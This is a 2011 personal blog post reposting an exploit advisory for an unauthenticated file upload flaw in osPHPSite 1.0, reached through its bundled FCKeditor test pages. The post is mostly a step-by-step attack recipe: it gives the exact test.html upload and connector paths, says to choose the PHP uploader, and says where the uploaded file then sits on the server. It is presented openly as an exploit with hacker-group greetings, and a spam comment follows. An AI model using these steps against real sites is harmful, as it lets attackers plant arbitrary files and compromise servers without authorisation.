.: Dee Personal Blog :.

Subtitle

Blog

osPHPSite (FCKeditor) File Upload Vulnerability

Posted by Root on July 29, 2011 at 11:10 AM

 

================================================

osPHPSite (FCKeditor) File Upload Vulnerability

================================================

:-------------------------------------------------------------------------------------------------------------------------:

: # Exploit Title : osPHPSite (FCKeditor) File Upload Vulnerability

: # Date : 29 July 2011

: # Author : X-Cisadane

: # Software Link : http://sourceforge.net/projects/osphpsite/ or http://www.osphpsite.com

: # Version : 1.0

: # Category : Web Applications

: # Vulnerability : File Upload Vulnerability

: # Tested On : Chromium Web Browser v13 (Linux Ubuntu)

: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari

:-------------------------------------------------------------------------------------------------------------------------:


# (!) Exploits & PoC :

 

#=========[ Upload File (via Browser) ]======

 

+> http://<site>/<osPHPsite installation directory>/fckeditor/editor/filemanager/upload/test.html

+> Select the "File Uploader" to use : PHP

+> Browse a file (.jpg, .gif, .txt or etc)

+> Send it to the server

-> Find it on : http://localhost/userfiles/<your file>

 

(+) Demo : 



 

+> http://<site>/<osPHPsite installation directory>/fckeditor/editor/filemanager/browser/default/connectors/test.html

+> Select the "Connector" to use : PHP

+> Browse a file (.jpg, .gif, .txt or etc)

+> Upload

-> Find it on : http://localhost/userfiles/file/<your file>

 


(+) Demo : 



 


Categories: Exploit

Post a Comment

Oops!

Oops, you forgot something.

Oops!

The words you entered did not match the given text. Please try again.

Already a member? Sign In

1 Comment

Reply asdasdsa
12:27 PM on September 7, 2013 
KONTOL